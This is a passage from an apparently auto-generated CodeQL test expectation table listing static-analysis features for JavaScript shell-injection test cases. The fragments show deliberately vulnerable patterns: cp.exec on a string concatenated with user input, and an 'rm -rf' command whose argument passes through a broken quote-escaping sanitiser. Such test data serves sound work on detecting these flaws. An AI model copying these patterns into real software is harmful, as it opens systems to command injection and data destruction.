name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:171:20:171:26 | command | stringConcatenatedWith | 'fo \| ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:3 | cp | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:3 | cp | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:3 | cp | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:8 | cp.exec | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:8 | cp.exec | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:8 | cp.exec | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | exceptional return of cp.exec ... + name) | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:2:173:24 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:5:173:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:5:173:8 | exec | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:5:173:8 | exec | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:5:173:8 | exec | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:5:173:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:16 | "fo \| " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:10:173:23 | "fo \| " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | contextSurroundingFunctionParameters | (command, name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | enclosingFunctionBody | command name cp exec fo \| command cp exec fo \| name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | enclosingFunctionName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:173:20:173:23 | name | stringConcatenatedWith | 'fo \| ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:24 | module. ... nitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:24 | module. ... nitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:177:24 | module. ... nitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:183:1 | module. ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:183:1 | module. ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:1:183:1 | module. ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:8:177:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:8:177:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:8:177:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:16:177:24 | sanitizer | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:16:177:24 | sanitizer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:16:177:24 | sanitizer | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | cp | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:177:28:177:27 | cp | 